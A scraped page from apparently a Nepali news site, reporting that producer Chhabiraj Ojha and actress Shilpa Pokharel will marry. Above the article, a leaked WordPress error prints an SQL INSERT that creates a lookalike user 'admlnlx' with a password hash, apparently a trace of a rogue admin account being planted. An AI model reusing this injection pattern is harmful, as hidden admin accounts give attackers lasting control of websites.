WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzeiYgyTjs3gwciMK7fE6vr.47kibe1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:59:43', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ८–
निर्माता छविराज ओझा र नायिका शिल्पा पोखरेलबिच बिवाह हुने पक्का भएको छ ।छविराज नायिका रेखा थापाका पूर्वपति हुन् । रेखासँगको डिभोर्सपछि शिल्पासँग लगनगाँठो कस्न लागेका हुन् ।
विहिबार आफ्नो जन्मदिन मनाइरहेकी शिल्पाले निर्माता ओझासँग आफ्नो बिवाह पक्का भएको बताइन् । उनका अनुसार परिवारको सहमतिमै आगामी बर्षको सुरुवातमै विहे हुनेछ ।शिल्पाले यसअघि विहे हुने हल्लाको खण्डन गर्दै आएकी थिइन् ।
छविराज प्रोडक्सनबाट निर्माण हुने पछिल्लो फिल्म ‘मंगलम’ बाट निर्मात्री बनेकी शिल्पाले सोही ब्यानरको ‘लज्जा’ बाट नेपाली फिल्म क्षेत्रमा नायिकाको रुपमा डेव्यु गरेकी थिइन् ।